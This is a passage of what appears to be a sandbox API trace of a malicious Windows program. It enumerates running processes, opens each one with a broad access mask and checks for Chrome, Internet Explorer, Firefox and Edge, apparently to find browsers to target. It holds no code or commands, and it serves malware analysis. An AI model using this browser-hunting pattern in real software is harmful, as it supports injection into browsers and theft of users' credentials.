	[0248.634] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.634] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.634] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9c40
	[0248.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.635] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9c44
	[0248.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.638] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.639] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.639] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.639] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9c48
	[0248.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.641] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.642] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.642] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.642] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9c4c
	[0248.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.643] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.644] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.644] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.644] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9c50
	[0248.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.645] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.646] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.646] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.646] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0248.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9c54
	[0248.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.648] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0248.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.648] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.648] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0248.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.649] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9c58
	[0248.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.650] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.650] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.651] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.651] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0248.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9c5c
	[0248.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.652] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.653] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.653] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.654] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9c60
	[0248.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.656] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.656] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.656] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.657] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9c64
	[0248.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.658] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.658] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.659] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.659] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9c68
	[0248.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.660] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.660] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.661] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.661] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0248.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9c6c
	[0248.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.662] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0248.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.663] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.663] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0248.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.663] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0248.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9c70
	[0248.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.665] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.665] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.665] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.666] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0248.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9c74
	[0248.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.667] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0248.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.667] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.667] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0248.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.668] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0248.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0248.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0248.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9c78
	[0248.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.670] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0248.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.671] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.671] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0248.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.672] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0248.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9c7c
	[0248.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.673] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0248.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.673] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.674] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0248.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.674] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.674] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0248.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9c80
	[0248.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.675] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0248.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.675] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.676] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0248.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.676] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.676] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0248.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9c84
	[0248.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.677] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0248.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.678] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.678] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0248.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.678] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0248.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9c88
	[0248.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.679] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0248.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.680] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.681] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0248.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.682] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0248.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9c8c
	[0248.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.683] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0248.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.683] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.684] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0248.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.684] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0248.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9c90
	[0248.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.685] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0248.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.685] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.686] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0248.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.686] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0248.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9c94
	[0248.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.687] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0248.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.688] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.688] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0248.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.689] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0248.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9c98
	[0248.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.690] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0248.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.690] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.691] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0248.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.691] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0248.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9c9c
	[0248.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.692] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0248.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.692] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.692] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0248.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.693] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
